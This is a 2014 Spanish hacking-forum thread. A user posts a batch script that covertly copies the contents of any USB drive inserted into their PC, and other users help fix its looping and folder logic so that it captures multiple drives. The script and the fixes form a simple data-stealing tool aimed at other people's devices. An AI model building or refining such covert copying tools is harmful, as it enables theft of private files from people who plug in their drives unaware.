elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Ayuda Código CMD- USB Stealer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Código CMD- USB Stealer  (Leído 3,357 veces)
shhadow9

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Ayuda Código CMD- USB Stealer
« en: 1 Junio 2014, 14:27 pm »

Hola buenas,
Quiero hacer un programa que: Copie memorias USBs en una carpeta (que yo elija) para ver que contenia la USB que se conecto en mi pc, pero que tambien cuando haya copiado la USB, siga funcionando por si meten otra USB y tambien copiarla en otra carpeta con un nombre diferente,
Bien dicho esto yo he estado trabajando en el código y he conseguido que me copie las USBs, pero aun me falta que si se introduce una segunda USB la copie tambien.
Mi código:
Código:
@echo off
color 0a
cls
 
:C
           
                           
if exist nose (
exit
             
) else ( 
xcopy "A:" "nose" /Y /H /E /F /I 
xcopy "B:" "nose" /Y /H /E /F /I
xcopy "D:" "nose" /Y /H /E /F /I
xcopy "E:" "nose" /Y /H /E /F /I
xcopy "F:" "nose" /Y /H /E /F /I
xcopy "G:" "nose" /Y /H /E /F /I
xcopy "H:" "nose" /Y /H /E /F /I
xcopy "I:" "nose" /Y /H /E /F /I
xcopy "J:" "nose" /Y /H /E /F /I
xcopy "K:" "nose" /Y /H /E /F /I
goto C
 
)
Espero su ayuda, Gracias de antemano [Escrito en código Bash]


En línea

adrianmendezRap

Desconectado Desconectado

Mensajes: 62


No es antiguo, es de coleccionista...


Ver Perfil
Re: Ayuda Código CMD- USB Stealer
« Respuesta #1 en: 1 Junio 2014, 15:22 pm »

No digo que en Batch no sea posible, pero has probado con otros lenguajes de scripting un poco mas avanzados? Al fin de cuentas Batch es una pasarela para la ejecución de procesos automatizados, aunque se le llame lenguaje no llega a serlo.


En línea

No es antiguo... es de coleccionista.
shhadow9

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ayuda Código CMD- USB Stealer
« Respuesta #2 en: 3 Junio 2014, 21:04 pm »

Intente hacerlo en vb 2010 pero tamben llegue al mismo problema lo de las carpetas
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Ayuda Código CMD- USB Stealer
« Respuesta #3 en: 4 Junio 2014, 03:11 am »

Intente hacerlo en vb 2010 pero tamben llegue al mismo problema lo de las carpetas


un ejemplo sacado de la misma msdn solo buscando en google sobre listar carpetas en vb
Código
  1. Dim archivo As String
  2. List1.Clear
  3. archivo = Dir(Text1.Text)
  4. Do While archivo <> ""
  5. List1.AddItem archivo
  6. archivo = Dir
  7. Loop
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Ayuda Código CMD- USB Stealer
« Respuesta #4 en: 4 Junio 2014, 05:10 am »

bueno por esto:
Código
  1. if exist nose (
  2.  
  3. )
como encuentra el directorio nose una vez copiada una memoria usb, comprueba que existe el directorio y se cierra el programa y por tanto no copia nada. tendras que crear un directorio aparte por cada memoria usb.

Código
  1. xcopy "A:" "A" /Y /H /E /F /I  
  2. xcopy "B:" "B" /Y /H /E /F /I

y luego comprobar si existe cada directorio. claro hay mejores formas de hacerlo pero lo digo asi para que encaje con tu programa
« Última modificación: 4 Junio 2014, 05:14 am por daryo » En línea

buenas
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.810



Ver Perfil
Re: Ayuda Código CMD- USB Stealer
« Respuesta #5 en: 28 Junio 2014, 07:32 am »

Podrías sacar algunas ideas productivas de aquí:



[BATCH] [APORTE] USB MON (Roba USB)

PD: Pero opino lo mismo que ya te comentaron, deberías utilizar un lenguaje de verdad.

Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
My USB Stealer « 1 2 3 »
Scripting
corax 23 16,125 Último mensaje 27 Noviembre 2008, 20:31 pm
por corax
MSN Stealer por PHP y Autocopiado USB by C@$P€® « 1 2 3 »
Programación Visual Basic
skyweb07 25 7,956 Último mensaje 18 Octubre 2008, 21:17 pm
por ~~
[Ayuda] Stealer VB6.0
Análisis y Diseño de Malware
Elemental Code 1 4,494 Último mensaje 14 Junio 2010, 16:01 pm
por kisk
ISR Stealer 0.1
Nivel Web
TinKode 8 4,184 Último mensaje 15 Julio 2010, 17:30 pm
por kisk
ISR Stealer v 0.2
Nivel Web
TinKode 7 5,168 Último mensaje 19 Julio 2010, 13:09 pm
por Debci
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines